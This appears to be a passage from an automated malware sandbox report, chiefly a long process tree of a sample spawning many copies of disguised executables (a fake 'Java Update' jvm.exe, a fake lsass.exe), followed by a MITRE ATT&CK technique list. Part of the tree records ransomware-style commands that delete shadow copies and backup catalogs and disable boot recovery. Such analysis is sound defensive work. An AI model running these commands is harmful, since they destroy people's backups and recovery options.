  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:16072
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:15840
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:16452
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:16792
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:17184
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:14976
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:17972
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:17628
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:18372
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:18068
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:18316
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:18000
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:18584
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:18916
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:19268
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:13172
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:19288
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:12452
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:16716
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:18684
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:19644
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:17284
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:19900
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:20200
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:16976
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:11132
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:3620
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:19372
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:18592
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:19196
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:19728
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:10416
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:20688
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:21020
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:21236
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:8224
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:20884
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:21132
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:20604
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:21176
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:7876
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:10720
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:7172
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:21724
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:21968
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:21588
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:22300
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:22036
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:7356
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:7764
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:8132
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:7620
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:6488
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:7380
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:864
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 864 -s 24
    3⤵
    - Program crash
    PID:6388
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:3012
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:3156
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:7280
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:8120
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:8224
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:8600
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 8600 -s 1192
    3⤵
    - Program crash
    PID:10236
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:9024
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:8516
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:9212
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:8824
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:8632
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:9040
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:8892
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:9556
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:9932
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:4572
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:9876
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:6768
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:10312
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:10772
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:11060
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:10372
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:4884
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:3156
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:8532
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:6680
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:11372
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:11760
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:12124
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:11280
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:8112
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:11980
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:6404
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:9600
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:12056
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:7992
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:9684
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:11916
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:10744
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:12168
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:8180
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:7668
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:8664
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:12396
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:13072
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:12420
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:13200
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:12608
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:13392
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:13680
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:13996
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:14260
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:5732
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:14220
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:12244
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:8196
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:364
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:14536
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:14960
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:15308
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:14444
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:15200
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:5072
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:12100
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:8480
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:15328
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:5528
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:15632
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:15932
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:16248
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:10628
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:15956
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:2184
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:15892
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:16240
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:16464
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:16756
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:17120
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:16240
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:16924
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:17900
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:18184
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:17736
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:8132
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:16152
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:13172
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:18636
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:18944
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:19304
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:16584
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:14808
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:18684
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:19292
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:15916
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:12636
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:19716
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:19992
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:20276
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:18324
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:17836
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:19892
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:17636
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:18308
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:16824
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:700
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:18912
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:20652
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:20980
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:21260
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:21500
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:20756
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:21388
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:21400
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:21260
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:13204
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:12540
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:21408
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:21680
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:21916
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:22200
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:21532
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:22240

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:656

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7276

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7412

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7508

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:6176

C:\Users\Admin\AppData\Local\Temp\848D.exe
C:\Users\Admin\AppData\Local\Temp\848D.exe
1⤵
PID:7772
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -start
  2⤵
  PID:8288
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 0
    3⤵
    PID:9436
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
    3⤵
    PID:9412
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:3056
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
    3⤵
    PID:7660
  - - C:\Windows\SysWOW64\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:6216
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    3⤵
    PID:9396
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:9324
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    3⤵
    PID:9352
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
    3⤵
    PID:7552
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:10044
- C:\Windows\SysWOW64\notepad.exe
  notepad.exe
  2⤵
  PID:8404

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8124

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1048

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5648

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5256

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7636

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7532

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3212

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6172

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3772

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4204

C:\Users\Admin\AppData\Roaming\aaugfdr
C:\Users\Admin\AppData\Roaming\aaugfdr
1⤵
PID:13324
- C:\Users\Admin\AppData\Roaming\aaugfdr
  C:\Users\Admin\AppData\Roaming\aaugfdr
  2⤵
  PID:9244

C:\Users\Admin\AppData\Roaming\rbugfdr
C:\Users\Admin\AppData\Roaming\rbugfdr
1⤵
PID:1268

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

